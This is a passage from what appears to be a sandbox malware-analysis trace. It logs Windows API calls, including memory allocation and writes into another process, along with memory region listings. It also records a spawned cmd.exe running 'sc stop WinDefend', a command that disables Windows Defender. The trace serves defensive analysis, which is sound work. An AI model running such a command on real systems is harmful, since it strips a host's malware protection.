NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x20, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140001000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x14002a000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x14002a000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x140033000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x4, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140033000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x140034000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140034000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x140037000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140037000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtProtectVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e0c0*=0x140038000, NumberOfBytesToProtect=0x28e138, NewAccessProtection=0x2, OldAccessProtection=0x28e270 | out: BaseAddress=0x28e0c0*=0x140038000, NumberOfBytesToProtect=0x28e138, OldAccessProtection=0x28e270*=0x4) returned 0x0 [0141.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e038*=0x0, ZeroBits=0x0, RegionSize=0x28e100*=0x30, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e038*=0x640000, RegionSize=0x28e100*=0x1000) returned 0x0 [0141.035] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0x640000, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x640000, ReturnLength=0x0) returned 0x0 [0141.035] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x7fffffdf010, Buffer=0x28e278*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e040 | out: Buffer=0x28e278*, NumberOfBytesWritten=0x28e040*=0x8) returned 0x0 [0141.035] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x7fffffdf018, Buffer=0x28e110, NumberOfBytesToRead=0x8, NumberOfBytesRead=0x28e048 | out: Buffer=0x28e110*, NumberOfBytesRead=0x28e048*=0x8) returned 0x0 [0141.036] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x77d72640, Buffer=0x28e158, NumberOfBytesToRead=0x30, NumberOfBytesRead=0x28e058 | out: Buffer=0x28e158*, NumberOfBytesRead=0x28e058*=0x30) returned 0x0 [0141.036] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x3626d0, Buffer=0x28e188, NumberOfBytesToRead=0x88, NumberOfBytesRead=0x28e068 | out: Buffer=0x28e188*, NumberOfBytesRead=0x28e068*=0x88) returned 0x0 [0141.036] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x362700, Buffer=0x28e278*, NumberOfBytesToWrite=0x8, NumberOfBytesWritten=0x28e080 | out: Buffer=0x28e278*, NumberOfBytesWritten=0x28e080*=0x8) returned 0x0 [0141.036] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28e000*=0x0, ZeroBits=0x0, RegionSize=0x28e008*=0x80, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28e000*=0x20000, RegionSize=0x28e008*=0x1000) returned 0x0 [0141.036] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20000, Buffer=0x28e070*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28e090 | out: Buffer=0x28e070*, NumberOfBytesWritten=0x28e090*=0x10) returned 0x0 [0141.036] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x20010, Buffer=0x682550*, NumberOfBytesToWrite=0x70, NumberOfBytesWritten=0x28dfd8 | out: Buffer=0x682550*, NumberOfBytesWritten=0x28dfd8*=0x70) returned 0x0 [0141.036] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x362718, Buffer=0x28e070*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28e0a0 | out: Buffer=0x28e070*, NumberOfBytesWritten=0x28e0a0*=0x10) returned 0x0 [0141.036] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28df88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28dff8 | out: Buffer=0x28df88*, NumberOfBytesRead=0x28dff8*=0x48) returned 0x0 [0141.036] NtAllocateVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x28df58*=0x0, ZeroBits=0x0, RegionSize=0x28df08*=0x10, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0x28df58*=0xe0000, RegionSize=0x28df08*=0x1000) returned 0x0 [0141.036] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0xe0000, Buffer=0x28df78*, NumberOfBytesToWrite=0x10, NumberOfBytesWritten=0x28df60 | out: Buffer=0x28df78*, NumberOfBytesWritten=0x28df60*=0x10) returned 0x0 [0141.037] NtWriteVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28df88*, NumberOfBytesToWrite=0x48, NumberOfBytesWritten=0x28e008 | out: Buffer=0x28df88*, NumberOfBytesWritten=0x28e008*=0x48) returned 0x0 [0141.037] NtClearEvent (EventHandle=0x144) returned 0x0 [0141.037] NtSignalAndWaitForSingleObject (SignalObject=0x140, WaitObject=0x144, Alertable=0, Time=0x0) returned 0x0 [0141.057] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x60000, Buffer=0x28df88, NumberOfBytesToRead=0x48, NumberOfBytesRead=0x28e010 | out: Buffer=0x28df88*, NumberOfBytesRead=0x28e010*=0x48) returned 0x0 [0141.057] NtFreeVirtualMemory (ProcessHandle=0xffffffffffffffff, BaseAddress=0x28e130*=0x640000, RegionSize=0x28e120, FreeType=0x8000) returned 0x0 [0141.058] NtClose (Handle=0x140) returned 0x0 [0141.058] NtClose (Handle=0x144) returned 0x0 [0141.058] CloseHandle (hObject=0x138) returned 1 [0141.058] CloseHandle (hObject=0x13c) returned 1 [0141.058] Sleep (dwMilliseconds=0x1f4) [0141.598] ExitProcess (uExitCode=0x0) Thread: id = 147 os_tid = 0x8b8 Process: id = "18" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x7578c000" os_pid = "0x528" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x668" cmd_line = "/c sc stop WinDefend" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2536 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2537 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2538 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2539 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2540 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2541 start_va = 0x130000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 2542 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 2543 start_va = 0x4a090000 end_va = 0x4a0dbfff entry_point = 0x4a090000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2544 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2545 start_va = 0x77e20000 end_va = 0x77f9ffff entry_point = 0x77e20000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2546 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2547 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2548 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2549 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2550 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2551 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2552 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2553 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2554 start_va = 0x752a0000 end_va = 0x752a7fff entry_point = 0x752a0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2555 start_va = 0x752b0000 end_va = 0x7530bfff entry_point = 0x752b0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2556 start_va = 0x75310000 end_va = 0x7534efff entry_point = 0x75310000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2952 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2953 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 2954 start_va = 0x70000 end_va = 0xd6fff entry_point = 0x70000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2955 start_va = 0x310000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 2956 start_va = 0x590000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 2957 start_va = 0x754b0000 end_va = 0x754b6fff entry_point = 0x754b0000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 2958 start_va = 0x75970000 end_va = 0x7597bfff entry_point = 0x75970000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2959 start_va = 0x75980000 end_va = 0x759dffff entry_point = 0x75980000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2960 start_va = 0x759e0000 end_va = 0x759f8fff entry_point = 0x759e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2961 start_va = 0x75a10000 end_va = 0x75abbfff entry_point = 0x75a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2962 start_va = 0x75f40000 end_va = 0x75f85fff entry_point = 0x75f40000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2963 start_va = 0x75fa0000 end_va = 0x7603cfff entry_point = 0x75fa0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2964 start_va = 0x760d0000 end_va = 0x761bffff entry_point = 0x760d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2965 start_va = 0x76220000 end_va = 0x7632ffff entry_point = 0x76220000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2966 start_va = 0x76490000 end_va = 0x7652ffff entry_point = 0x76490000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2967 start_va = 0x76a70000 end_va = 0x76afffff entry_point = 0x76a70000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2968 start_va = 0x77810000 end_va = 0x77819fff entry_point = 0x77810000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2969 start_va = 0x77820000 end_va = 0x7791ffff entry_point = 0x77820000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2970 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x0 region_type = private name = "private_0x0000000077a20000" filename = "" Region: id = 2971 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x0 region_type = private name = "private_0x0000000077b20000" filename = "" Region: id = 2972 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2973 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2974 start_va = 0x690000 end_va = 0x817fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 2975 start_va = 0x75c00000 end_va = 0x75c5ffff entry_point = 0x75c00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2976 start_va = 0x75e50000 end_va = 0x75f1bfff entry_point = 0x75e50000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2977 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2978 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 2979 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 2980 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 2981 start_va = 0x820000 end_va = 0x9a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 2982 start_va = 0x9b0000 end_va = 0x1daffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 2983 start_va = 0x1db0000 end_va = 0x20f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001db0000" filename = "" Region: id = 3073 start_va = 0x2100000 end_va = 0x23cefff entry_point = 0x2100000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 148 os_tid = 0x550 [0140.406] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28ff34 | out: lpSystemTimeAsFileTime=0x28ff34*(dwLowDateTime=0xf321ca00, dwHighDateTime=0x1d48db2)) [0140.406] GetCurrentProcessId () returned 0x528 [0140.406] GetCurrentThreadId () returned 0x550 [0140.406] GetTickCount () returned 0x2eb76 [0140.406] QueryPerformanceCounter (in: lpPerformanceCount=0x28ff2c | out: lpPerformanceCount=0x28ff2c*=1820803000000) returned 1 [0140.407] GetModuleHandleA (lpModuleName=0x0) returned 0x4a090000 [0140.407] __set_app_type (_Type=0x1) [0140.407] __p__fmode () returned 0x75ab31f4 [0140.407] __p__commode () returned 0x75ab31fc [0140.407] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a0b21a6) returned 0x0 [0140.408] __getmainargs (in: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c, _DoWildCard=0, _StartInfo=0x4a0b4140 | out: _Argc=0x4a0b4238, _Argv=0x4a0b4240, _Env=0x4a0b423c) returned 0 [0140.408] GetCurrentThreadId () returned 0x550 [0140.408] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x550) returned 0x60 [0140.408] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.408] GetProcAddress (hModule=0x76220000, lpProcName="SetThreadUILanguage") returned 0x7624a84f [0140.408] SetThreadUILanguage (LangId=0x0) returned 0x409 [0140.408] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0140.408] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fec4 | out: phkResult=0x28fec4*=0x0) returned 0x2 [0140.408] VirtualQuery (in: lpAddress=0x28fefb, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0140.408] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fe94, dwLength=0x1c | out: lpBuffer=0x28fe94*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x80000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0140.408] GetConsoleOutputCP () returned 0x1b5 [0140.409] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.409] SetConsoleCtrlHandler (HandlerRoutine=0x4a0ae72a, Add=1) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0140.409] _get_osfhandle (_FileHandle=1) returned 0x7 [0140.409] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0140.409] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.409] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0140.410] _get_osfhandle (_FileHandle=0) returned 0x3 [0140.410] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x5a1f50* [0140.410] FreeEnvironmentStringsW (penv=0x5a1f50) returned 1 [0140.410] GetEnvironmentStringsW () returned 0x5a1f50* [0140.410] FreeEnvironmentStringsW (penv=0x5a1f50) returned 1 [0140.410] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee34 | out: phkResult=0x28ee34*=0x68) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x0, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x1, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x1, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x0, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x40, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x40, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.410] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x40, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x68) returned 0x0 [0140.411] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28ee34 | out: phkResult=0x28ee34*=0x68) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x40, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x1, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x1, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x0, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x9, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x4, lpData=0x28ee40*=0x9, lpcbData=0x28ee38*=0x4) returned 0x0 [0140.411] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28ee3c, lpData=0x28ee40, lpcbData=0x28ee38*=0x1000 | out: lpType=0x28ee3c*=0x0, lpData=0x28ee40*=0x9, lpcbData=0x28ee38*=0x1000) returned 0x2 [0140.411] RegCloseKey (hKey=0x68) returned 0x0 [0140.411] time (in: timer=0x0 | out: timer=0x0) returned 0x5c09a272 [0140.411] srand (_Seed=0x5c09a272) [0140.411] GetCommandLineW () returned="/c sc stop WinDefend" [0140.411] GetCommandLineW () returned="/c sc stop WinDefend" [0140.411] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.411] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5a1f58, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.412] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.412] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.412] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.412] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.412] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.412] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.412] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.412] GetEnvironmentStringsW () returned 0x5a2168* [0140.412] FreeEnvironmentStringsW (penv=0x5a2168) returned 1 [0140.412] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.412] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.412] _wcsicmp 